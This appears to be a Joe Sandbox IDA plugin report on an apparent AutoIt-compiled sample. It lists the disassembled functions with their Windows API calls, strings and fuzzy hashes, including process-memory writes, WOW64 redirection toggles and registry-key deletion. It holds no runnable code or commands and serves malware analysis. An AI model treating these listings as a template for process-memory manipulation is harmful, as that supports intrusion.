Part of subcall function 003C0DB6: __CxxThrowException@8.LIBCMT ref: 003C0E01

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Part of subcall function 003A7A51: _memmove.LIBCMT ref: 003A7AAB

__swprintf.LIBCMT ref: 003B2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003B2D66

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: bcc7ed2d6dda42f45cfcb67ec030db9045151a748b5dec88845d663bbee6d49a
Instruction ID: cdf4f5d235f0b9d521bf99ce7b28f0f5b7ca66b2e93861204f6d64c6c68e627d
Opcode Fuzzy Hash: bcc7ed2d6dda42f45cfcb67ec030db9045151a748b5dec88845d663bbee6d49a
Instruction Fuzzy Hash: 5E917C311082519FC716EF25C886DAFB7A8EF96354F004A1EF5469F6A1DB30ED44CB52

Function 0040B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 003A4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003A4743,?,?,003A37AE,?), ref: 003A4770

CoInitialize.OLE32(00000000), ref: 0040B9BB
CoCreateInstance.OLE32(00432D6C,00000000,00000001,00432BDC,?), ref: 0040B9D4
CoUninitialize.OLE32 ref: 0040B9F1

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

Strings

.lnk, xrefs: 0040B99D, 0040B9AB

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: c583d3e5bf941b0ec7a3706b2b83ba9a69f40a21c63cab1d82c4ede18dae3184
Instruction ID: 99dc3026fcbe37769baf6ae65e8511638e1d2b79b6e1d39a139c146f60c3b17d
Opcode Fuzzy Hash: c583d3e5bf941b0ec7a3706b2b83ba9a69f40a21c63cab1d82c4ede18dae3184
Instruction Fuzzy Hash: 82A145756043019FC710DF14C884E2AB7E5FF8A314F14896AF899AB3A2CB35EC45CB95

Function 003FB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 003FB4BE

Strings

%C, xrefs: 003FB561
AutoIt3GUI, xrefs: 003FB436
Container, xrefs: 003FB43B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%C
API String ID: 3565006973-498391164
Opcode ID: 16cbb261dd96ad6f400f5b89ec19b35c1aa14b76db2d468144750f8248cd49dd
Instruction ID: fc3fe02f3939ab82489f3fe234027aa3a836c18e207a9d0aa5ca10f5759bf0e4
Opcode Fuzzy Hash: 16cbb261dd96ad6f400f5b89ec19b35c1aa14b76db2d468144750f8248cd49dd
Instruction Fuzzy Hash: FE915BB4200605AFDB15DF64C884B6AB7F9FF49710F20856EFA4ACB6A1DB74E841CB50

Function 003C501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 003C50AD

Part of subcall function 003D00F0: __87except.LIBCMT ref: 003D012B

Strings

pow, xrefs: 003C5085, 003C50A2

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 4a4b892b5a912e6f81c50f8cd69b25003f040165c0ffa9b525dd1289ae7525e5
Instruction ID: 5140eb5f4824b650a3c0620a0f433b470e84bb530b13f365e967d1b1915677b0
Opcode Fuzzy Hash: 4a4b892b5a912e6f81c50f8cd69b25003f040165c0ffa9b525dd1289ae7525e5
Instruction Fuzzy Hash: C1518D7290960196DB1B7B24EC0576E3BD4EB40B00F248D6EE4D5C63AAEF349DC49B86

Function 003E8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003E862B
_memmove.LIBCMT ref: 003E8685

Strings

_;, xrefs: 003E86FF, 003EDFDC, 003EDFF8
3c;, xrefs: 003E860C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove
String ID: 3c;$_;
API String ID: 4104443479-934490711
Opcode ID: 9c4570ccfa934dabe473d137d93b1ce46b8009120d086b295fdbc80daa74f0f8
Instruction ID: 1701a638d88405f9c571bfdd2c49579613dfd40a7e712964862298597b37e84f
Opcode Fuzzy Hash: 9c4570ccfa934dabe473d137d93b1ce46b8009120d086b295fdbc80daa74f0f8
Instruction Fuzzy Hash: 3451AE70D00619DFCF26CF69C880AAEB7B1FF45304F248629E95AD7690EB30E955CB51

Function 003F97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004014BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003F9296,?,?,00000034,00000800,?,00000034), ref: 004014E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003F983F

Part of subcall function 00401487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003F92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004014B1

Part of subcall function 004013DE: GetWindowThreadProcessId.USER32(?,?), ref: 00401409
Part of subcall function 004013DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003F925A,00000034,?,?,00001004,00000000,00000000), ref: 00401419
Part of subcall function 004013DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003F925A,00000034,?,?,00001004,00000000,00000000), ref: 0040142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003F98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003F98F9

Strings

@, xrefs: 003F9911

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 75b04f856a78a57d794b6a14b060cb12961df62af11c31155f6b785904743a06
Instruction ID: e59f87dbe10ed8d8ad520802af6a033c3932899f39f4dea3e78d1a3374969862
Opcode Fuzzy Hash: 75b04f856a78a57d794b6a14b060cb12961df62af11c31155f6b785904743a06
Instruction Fuzzy Hash: 5241317690011CAFDB11DF94CC81FDEBB78EB09300F11416AFA55B7191DA756E49CBA0

Function 00427946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0042F910,00000000,?,?,?,?), ref: 004279DF
GetWindowLongW.USER32 ref: 004279FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00427A0C

Strings

SysTreeView32, xrefs: 004279B1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 2ce0414a37914c123a818afe4bc90d6c0ed4620805b25d284b7d849349be8b6c
Instruction ID: 807e654b349700205ca5335f97f679cc45d8a860ee74162f3108d1fe548ffeea
Opcode Fuzzy Hash: 2ce0414a37914c123a818afe4bc90d6c0ed4620805b25d284b7d849349be8b6c
Instruction Fuzzy Hash: CE31C071204216ABEB118E38EC41BEB77A9FB05334F604726F875A32E0D734E9918B58

Function 004273D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00427461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00427475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00427499

Strings

SysMonthCal32, xrefs: 0042742C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 9b106f4f181946f38230149ac784719b566dac11cd27cc8f0e11042267286d17
Instruction ID: 28158468f03e93e743efd618bc61da6218c6d7ef9b0ca63ba83833d4b4b8920d
Opcode Fuzzy Hash: 9b106f4f181946f38230149ac784719b566dac11cd27cc8f0e11042267286d17
Instruction Fuzzy Hash: DF21E132600228BBDF119F54DC42FEB3B79EB48724F510115FE146B1D0DAB9AC558BA4

Function 00427B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00427C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00427C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00427C5F

Strings

msctls_updown32, xrefs: 00427BC4

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 412458ed92f27d339533c7dd53b48264aef02a1c9b76ca06231b84391c71e34b
Instruction ID: 42d616ffd96a051f03fb53e7a9e407dadd77ce42cccc521207c4a66f5bc67d97
Opcode Fuzzy Hash: 412458ed92f27d339533c7dd53b48264aef02a1c9b76ca06231b84391c71e34b
Instruction Fuzzy Hash: A32192B5604119AFDB11DF24ECC1D6737ECEF4A394B54006AF9019B361CB75EC118BA4

Function 00426CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00426D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00426D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00426D70

Strings

Listbox, xrefs: 00426D08

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 9ae33c5e798106e60c10eeb466713b068349e8030f9594e7c43af32ef375bc90
Instruction ID: 58fe12b2d4a6147c93978a4db8a11d3acf337ae7f2b90379b8905a0e9ed15b26
Opcode Fuzzy Hash: 9ae33c5e798106e60c10eeb466713b068349e8030f9594e7c43af32ef375bc90
Instruction Fuzzy Hash: E421D332310128BFDF118F54DC44FAB377AEF89750F818129F9409B290C6759C5187A4

Function 004139E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00413A66

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 00413A58
, $, xrefs: 00413AA6
%C, xrefs: 004139F4

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%C
API String ID: 3506404897-1061350530
Opcode ID: fbf80ebbc5427952524dd64d79efb95d27e04e944b4c4ad71849c8c69167d6e5
Instruction ID: 22d240afebddff83a5bb1d050ba1e334bd1f47bcff9755c8055d6c75e88a2ecf
Opcode Fuzzy Hash: fbf80ebbc5427952524dd64d79efb95d27e04e944b4c4ad71849c8c69167d6e5
Instruction Fuzzy Hash: 3E21BF30600218ABCF11EF64CC82EEE77B5EF45351F50045AF805BB182DB38EA45CB69

Function 0042770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00427772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00427787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00427794

Strings

msctls_trackbar32, xrefs: 00427749

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 54441bf1cc2cee05e0efb83f35bb7da9bc7e668cf22e83db42538f98a5dd995d
Instruction ID: 09ac2855ff0abe5131c988175be4a5ac4bfecc795aa5a51de21016aff8a92568
Opcode Fuzzy Hash: 54441bf1cc2cee05e0efb83f35bb7da9bc7e668cf22e83db42538f98a5dd995d
Instruction Fuzzy Hash: 21113632300208BFEF205F61DC05FEB37A8EFC9B54F110129FA41A6190C276E811CB28

Function 003C6B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 003C6B93
__calloc_crt.LIBCMT ref: 003C6BAC

Strings

@BF, xrefs: 003C6BC3
E, xrefs: 003C6BD1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __calloc_crt
String ID: E$@BF
API String ID: 3494438863-3695719824
Opcode ID: f6e41867f40601344fa920cdfc5cff364f3a9aed35eb39bc7556f22e654b808f
Instruction ID: 18fe69ece1f678cb607dd3d3354a1c5a512eaac56c400e0cb5d9e6ff0580d6af
Opcode Fuzzy Hash: f6e41867f40601344fa920cdfc5cff364f3a9aed35eb39bc7556f22e654b808f
Instruction Fuzzy Hash: CBF04F72208B129BE7698F6AFC62F663794E714734F50046FE504CE591FBB48D818B89

Function 003C9B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 003C9B94

Part of subcall function 003C9C0B: __mtinitlocknum.LIBCMT ref: 003C9C1D
Part of subcall function 003C9C0B: EnterCriticalSection.KERNEL32(00000000,?,003C9A7C,0000000D), ref: 003C9C36

__updatetlocinfoEx_nolock.LIBCMT ref: 003C9BA4

Part of subcall function 003C9100: ___addlocaleref.LIBCMT ref: 003C911C
Part of subcall function 003C9100: ___removelocaleref.LIBCMT ref: 003C9127
Part of subcall function 003C9100: ___freetlocinfo.LIBCMT ref: 003C913B

Strings

8E, xrefs: 003C9B85
8E, xrefs: 003C9B8A, 003C9B9F, 003C9BAB

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8E$8E
API String ID: 547918592-3916816995
Opcode ID: 31ad12fa4fbfb0533f7010cd9575e87dbececa75ba9932cafe7c1c613bc2755b
Instruction ID: 609cdf3723a109dca761ef99b670f5b9887f51420812c910d530d6ef8377b972
Opcode Fuzzy Hash: 31ad12fa4fbfb0533f7010cd9575e87dbececa75ba9932cafe7c1c613bc2755b
Instruction Fuzzy Hash: 40E08631943701E9D616F7A5A90BF0C36505B04723F22515FF445D90C3CE742E04875F

Function 003A4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,003A4B83,?), ref: 003A4C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003A4C56

Strings

kernel32.dll, xrefs: 003A4C3F
Wow64RevertWow64FsRedirection, xrefs: 003A4C50

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 88158cfcd739d00b9b899dafc467b336a59f7d50daa95f677089b5edc89babdf
Instruction ID: af3a8747b8ae7e6456eff761c1df250db5c21bcfbd02e297c081bc056619e35c
Opcode Fuzzy Hash: 88158cfcd739d00b9b899dafc467b336a59f7d50daa95f677089b5edc89babdf
Instruction Fuzzy Hash: E7D0C230600723DFC7204F31D90831677E4AF05351BE1883A9495C6164E6B4D884C614

Function 003A4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,003A4BD0,?,003A4DEF,?,004652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003A4C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003A4C23

Strings

kernel32.dll, xrefs: 003A4C0C
Wow64DisableWow64FsRedirection, xrefs: 003A4C1D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 4e519abf75bf4df9034c9c274da5d4fdb0e4ba38dfcc527ca9cfdcbb879f375c
Instruction ID: 8ac4d1e44f6b053072834560ac8f05d6e6022a7c30a92c908b748aa7f2050f73
Opcode Fuzzy Hash: 4e519abf75bf4df9034c9c274da5d4fdb0e4ba38dfcc527ca9cfdcbb879f375c
Instruction Fuzzy Hash: 65D0C230600713DFC7206F70D908317BAE5EF09352BD18C3A9486C2160E6B4D884C614

Function 00420DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00421039), ref: 00420DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00420E07

Strings

advapi32.dll, xrefs: 00420DF0
RegDeleteKeyExW, xrefs: 00420E01

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 5efa20a2781ffd2f15284b542ac286f61dc49337e4bac04f0d167d94acc8a7ad
Instruction ID: 429048619dfafe1f97c2603c091962c5b3de67aa830ab03659374f0f07f6b999
